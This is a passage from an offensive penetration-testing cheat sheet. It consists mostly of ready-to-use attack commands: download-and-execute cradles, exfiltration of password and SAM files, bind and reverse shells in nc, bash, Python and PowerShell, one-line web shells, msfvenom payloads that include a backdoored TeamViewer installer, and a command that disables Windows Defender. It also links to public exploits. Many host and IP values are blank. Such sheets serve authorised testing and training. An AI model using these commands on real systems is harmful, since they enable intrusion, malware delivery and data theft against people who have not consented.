http://:8000/exploit.sh -o exploit.sh $ curl http://:8000/exploit.sh | bash - PHP Downloads (Kali -> Linux) $ php -r '$file = file_get_contents("http://:8000/exploit.sh"); file_put_contents("exploit.sh",$file);' $ php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);' $ php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash - Ruby Server (Kali -> Linux) $ ruby -run -ehttpd . -p8000 $ wget http://:8000/exploit.sh -O exploit.sh $ curl http://:8000/exploit.sh -o exploit.sh $ curl http://:8000/exploit.sh | bash - Ruby Downloads (Kali -> Linux) $ ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))' - Perl Downloads (Kali -> Linux) $ perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");' - SCP Downloads (Kali -> Windows) $ sudo systemctl enable ssh $ sudo systemctl start ssh $ scp @:/tmp/exploit.exe C:\Temp\exploit.exe - SCP Downloads (Kali -> Linux) $ sudo systemctl enable ssh $ sudo systemctl start ssh $ scp @:/tmp/exploit.sh . - SCP Uploads (Windows -> Kali) C:\> scp C:\Temp\exploit.exe @:/tmp/exploit.exe - SCP Uploads (Linux -> Kali) C:\> scp /tmp/exploit.sh @:/tmp/exploit.sh - OpenSSL Download (Kali -> Linux) $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem $ openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh $ openssl s_client -connect :80 -quiet > LinEnum.sh - OpenSSL Encrypted Download (Kali -> Linux) $ openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc $ openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd - Nginx Uploads (Linux -> Kali) $ sudo mkdir -p /var/www/uploads/SecretUploadDirectory $ sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory # Create the Nginx configuration file by creating the file /etc/nginx/sites-available/upload.conf with the contents server { listen 9001; location /SecretUploadDirectory/ { root /var/www/uploads; dav_methods PUT; } } $ sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/ $ sudo systemctl restart nginx.service $ tail -2 /var/log/nginx/error.log $ ss -lnpt | grep 80 $ ps -ef | grep $ sudo rm /etc/nginx/sites-enabled/default $ curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt $ sudo tail -1 /var/www/uploads/SecretUploadDirectory/users.txt - PowerShell DownloadFile (Kali -> Windows) PS C:\> (New-Object Net.WebClient).DownloadFile('http://:8000/exploit.ps1','C:\Users\Public\Downloads\exploit.ps1') C:\> powershell -c "(New-Object System.Net.WebClient).DownloadFile('http:///exploit.exe','C:\Users\Offsec\Desktop\new-exploit.exe')" - PowerShell Invoke-WebRequest (Kali -> Windows) PS C:\> Invoke-WebRequest http://:8000/exploit.ps1 -OutFile exploit.ps1 PS C:\> iwr http://:8000/exploit.ps1 -OutFile exploit.ps1 PS C:\> Invoke-WebRequest http:///exploit.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "exploit.exe" # Internet Explorer first-launch error PS C:\> Invoke-WebRequest http://:8000/exploit.ps1 -UseBasicParsing | IEX # SSL/TLS secure channel error PS C:\> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} - PowerShell WinHTTPRequest (Kali -> Windows) PS C:\> $h=new-object -com WinHttp.WinHttpRequest.5.1; PS C:\> $h.open('GET','http:///nc.exe',$false); PS C:\> $h.send(); PS C:\> iex $h.ResponseText - Msxml2 (Kali -> Windows) PS C:\> $h=New-Object -ComObject Msxml2.XMLHTTP; PS C:\> $h.open('GET','http:///nc.exe',$false); PS C:\> $h.send(); PS C:\> iex $h.responseText - PowerShell DownloadString (Download & Execute Cradle - Fileless) (Kali -> Windows) PS C:\> IEX (New-Object Net.WebClient).DownloadString('http://:8000/exploit.ps1') https://gist.github.com/HarmJ0y/bb48307ffa663256e239 - PowerShell Web Uploads (Windows -> Kali) $ pip3 install uploadserver $ python3 -m uploadserver PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') PS C:\> Invoke-FileUpload -Uri http:///upload -File C:\Windows\System32\drivers\etc\hosts - PowerShell Base64 Web Uploads (Windows -> Kali) PS C:\> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte)) PS C:\> Invoke-WebRequest -Uri http://:443/ -Method POST -Body $b64s $ nc -nlvp 8000 $ echo | base64 -d -w 0 > hosts - PowerShell Remoting (Windows -> Windows) PS C:\> Test-NetConnection -ComputerName -Port 5985 PS C:\> $Session = New-PSSession -ComputerName PS C:\> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\ PS C:\> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session - PowerShell Encrypted Download (Kali -> Windows) # https://www.powershellgallery.com/packages/DRTools/4.0.2.3/Content/Functions%5CInvoke-AESEncryption.ps1 PS C:\> Import-Module .\Invoke-AESEncryption.ps1 PS C:\> Invoke-AESEncryption -Mode Encrypt -Key "" -Path .\scan-results.txt - SMB Downloads (Kali -> Windows) $ sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test C:\> net use n: \\\smbshare /user:test test C:\> copy n:\exploit.exe OR C:\> copy \\\a\whoami.exe C:\Windows\Temp\whoami.exe OR $ smbserver.py a /usr/share/windows-binaries/ $ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support MyShare /tmp C:\> move sam.save \\\MyShare - SMB Uploads WebDav (Windows -> Kali) $ sudo pip3 install wsgidav cheroot $ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous C:\> dir \\\DavWWWRoot C:\> copy C:\Users\Public\Downloads\exploit.exe \\\DavWWWRoot\ - FTP Downloads (Kali -> Windows) $ sudo pip3 install pyftpdlib $ sudo python3 -m pyftpdlib --port 21 PS C:\> (New-Object Net.WebClient).DownloadFile('ftp:///file.txt', 'C:\Users\Public\ftp-file.txt') - FTP Uploads (Windows -> Kali) $ sudo python3 -m pyftpdlib --port 21 --write PS C:\> (New-Object Net.WebClient).UploadFile('ftp:///ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts') - FTP Downloads Non-Interactively (Kali -> Windows) C:\> echo open 192.168.49.128 > ftpcommand.txt C:\> echo USER anonymous >> ftpcommand.txt C:\> echo binary >> ftpcommand.txt C:\> echo GET file.txt >> ftpcommand.txt C:\> echo bye >> ftpcommand.txt C:\> ftp -v -n -s:ftpcommand.txt ftp> open 192.168.49.128 Log in with USER and PASS first. ftp> USER anonymous ftp> GET file.txt ftp> bye C:\>cat file.txt This is a test file - FTP Uploads Non-Interactively (Windows -> Kali) C:\> echo open 192.168.49.128 > ftpcommand.txt C:\> echo USER anonymous >> ftpcommand.txt C:\> echo binary >> ftpcommand.txt C:\> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt C:\> echo bye >> ftpcommand.txt C:\> ftp -v -n -s:ftpcommand.txt ftp> open 192.168.49.128 Log in with USER and PASS first. ftp> USER anonymous ftp> PUT c:\windows\system32\drivers\etc\hosts ftp> bye - Wget (Kali -> Linux) $ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh $ wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3 - Curl (Kali -> Linux) $ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -o /tmp/LinEnum.sh $ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash - Bash (/dev/tcp) (Kali -> Linux) $ exec 3<>/dev/tcp/10.10.10.32/80 $ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 $ cat <&3 - Bitsadmin (Kali -> Windows) C:\> bitsadmin /transfer n http:///exploit.exe C:\Temp\exploit.exe PS C:\> bitsadmin /transfer wcb /priority foreground http://:8000/nc.exe C:\Users\Administrator\Desktop\nc.exe PS C:\> Import-Module bitstransfer; Start-BitsTransfer -Source "http://:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe" PS C:\> Import-Module bitstransfer; PS C:\> Start-BitsTransfer 'http:///nc.exe' $env:temp\t; PS C:\> $r=gc $env:temp\t; PS C:\> rm $env:temp\t; PS C:\> iex $r - CertReq (https://github.com/juliourena/plaintext/raw/master/hackthebox/certreq.exe) (Windows -> Kali) C:\> certreq.exe -Post -config http://:8000/ c:\Temp\exploit.exe $ sudo nc -lvnp 8000 - Certutil (Kali -> Windows) C:\> certutil.exe -urlcache -split -f http:///exploit.exe C:\> certutil.exe -verifyctl -split -f http:///exploit.exe - GfxDownloadWrapper.exe (Kali -> Windows) PS C:\> GfxDownloadWrapper.exe "http:///nc.exe" "C:\Temp\nc.exe" - JavaScript (cscript.exe) Downloads (Kali -> Windows) # Save to wget.js var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1; BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody); BinStream.SaveToFile(WScript.Arguments(1)); C:\> cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1 - VBScript (cscript.exe) Downloads (Kali -> Windows) # Save to wget.vbs dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", WScript.Arguments.Item(0), False xHttp.Send with bStrm .type = 1 .open .write xHttp.responseBody .savetofile WScript.Arguments.Item(1), 2 end with C:\> cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1 - Rdesktop (Windows -> Windows) $ rdesktop -d -u -p '' -r disk:linux='/home/user/rdesktop/files' Browse to \\tsclient\ or use mstsc.exe -> Local Resources -> More -> Drives - Xfreerdp (Windows -> Windows) $ xfreerdp /v: /d: /u: /p:'' /drive:linux,/home/plaintext/htb/academy/filetransfer Browse to \\tsclient\ or use mstsc.exe -> Local Resources -> More -> Drives - HTTP User-Agents https://useragentstring.com/index.php https://useragentstring.com/pages/useragentstring.php PS C:\>[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl PS C:\> $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome PS C:\> Invoke-WebRequest http:///nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe" - SMBClient Bulk Download Script SERVER="" USER="\\" PASS="" for share in $(smbclient -L $SERVER -U $USER%$PASS 2>/dev/null | awk '/Disk/ {print $1}'); do echo "[+] Downloading $share ..." mkdir -p "$share" smbclient //$SERVER/$share -U $USER%$PASS -c "recurse ON; prompt OFF; lcd \"$share\"; mget *" done ## #9. - Restricted Shell Escapes - Shell Escapes $ /bin/sh -i $ bash -i $ echo os.system('/bin/bash') $ python -c 'import pty; pty.spawn("/bin/bash")' $ python3 -c 'import pty;pty.spawn("/bin/bash")' $ script /dev/null -c bash $ perl —e 'exec "/bin/sh";' $ perl: exec "/bin/sh"; $ ruby: exec "/bin/sh" $ lua: os.execute('/bin/sh') $ awk 'BEGIN {system("/bin/sh")}' $ find / -name nameoffile 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \; $ find . -exec /bin/sh \; -quit $ vim -c ':!/bin/sh' - Tab Auto Completion $ CTRL+Z $ stty raw -echo $ fg $ reset $ export TERM=xterm-256color $ stty rows 67 columns 318 ## #10. - Shells - Bind Shells https://www.revshells.com/ $ nc -nlvp -e /bin/bash $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f $ python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("",));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' $ powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(); - Reverse Shells https://www.revshells.com/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md $ nc -nv -e /bin/bash msf6 > use multi/handler $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f $ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 $ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' $ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 $ socat file:`tty`,raw,echo=0 tcp-listen:4444 $ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::4444 msf> use exploit/multi/handler - Web Shells https://github.com/jbarcia/Web-Shells/tree/master/laudanum https://github.com/samratashok/nishang/tree/master/Antak-WebShell https://github.com/WhiteWinterWolf/wwwolf-php-webshell PHP: JSP: <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ASP: <% eval request("cmd") %> - Default Webroot Locations Apache: /var/www/html/ Nginx: /usr/local/nginx/html/ IIS: c:\inetpub\wwwroot\ XAMPP: C:\xampp\htdocs\ - MSFvenom http://pentestmonkey.net/tools/web-shells/php-reverse-shell Edit IP address and port $ msfvenom -l payloads $ msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php $ msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php $ msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp $ msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > shell.aspx $ msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp $ msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war $ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -o shell.exe $ msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf > shell.elf $ msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho $ msfvenom -p windows/x86/meterpreter_reverse_tcp LHOST= LPORT= -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5 ## #11. - Evasion - Disable Windows Defender PS C:\> Get-MpComputerStatus PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true - View AppLocker Policies PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections - View PowerShell Language Mode PS C:\> $ExecutionContext.SessionState.LanguageMode - Downgrade PowerShell PS C:\> Get-Host PS C:\> powershell.exe -version 2 PS C:\> Get-Host - View Windows Firewall Settings C:\> netsh advfirewall show allprofiles C:\> sc query windefend - View Other Active Users PS C:\> qwinsta ## #12. - Online Resources - Speedguide https://www.speedguide.net/port.php?port=3389 - CrackStation https://crackstation.net/ - Living Off The Land Binaries, Scripts and Libraries (LOLBAS) https://lolbas-project.github.io/ - GTFOBins https://gtfobins.github.io/ ## #13. - Browser Plugins - Wappalyzer: Website technology analyser https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/ - Cookie Editor: edit cookies https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/ - FoxyProxy: proxy management https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ ## #14. - Exploits - MS17-010 https://github.com/worawit/MS17-010/blob/master/zzz_exploit.py $ ./zzz_exploit.py ntsvcs https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py https://github.com/3ndG4me/AutoBlue-MS17-010 - MS08-067 https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py - CVE-2007-2447 https://github.com/amriunix/CVE-2007-2447 - PHP 8.1.0-dev Backdoor Remote Code Execution https://github.com/flast101/php-8.1.0-dev-backdoor-rce - CVE-2021-4034 https://github.com/joeammond/CVE-2021-4034/blob/main/CVE-2021-4034.py ## #15. - Exploit Research - CVEdetails https://www.cvedetails.com/ - Exploit DB https://www.exploit-db.com/ - Vulners https://vulners.com/ - Rapid7 https://www.rapid7.com/db/ - Vulnerability Lab https://www.vulnerability-lab.com/ - Packet Storm Security https://packetstormsecurity.com/ - NIST https://nvd.nist.gov/vuln/search?execution=e2s1
标签:DNS 反向解析, Web报告查看器, XXE攻击, 信息收集, 协议分析, 安全备忘单, 实时处理, 密码管理, 权限提升, 渗透测试, 漏洞利用, 红队工具